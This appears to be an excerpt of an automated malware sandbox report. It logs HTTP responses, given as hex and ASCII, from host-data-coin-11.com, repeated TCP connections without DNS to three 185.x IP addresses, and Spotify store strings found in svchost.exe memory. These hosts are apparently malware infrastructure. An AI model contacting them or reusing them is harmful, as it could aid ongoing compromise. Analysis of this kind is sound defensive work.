                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 01 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU:@Rw0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 03:59:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec ad 8e 70 bc 57 dd 43 de f7 22 85 25 e6 c3 9b 58 2c e0 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC"%X,c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 04:00:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: svchost.exe, 00000012.00000003.386418212.000001994C78A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                          Source: svchost.exe, 00000012.00000003.386418212.000001994C78A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
                          Source: svchost.exe, 00000012.00000003.386418212.000001994C78A000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.386449355.000001994C79B000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free 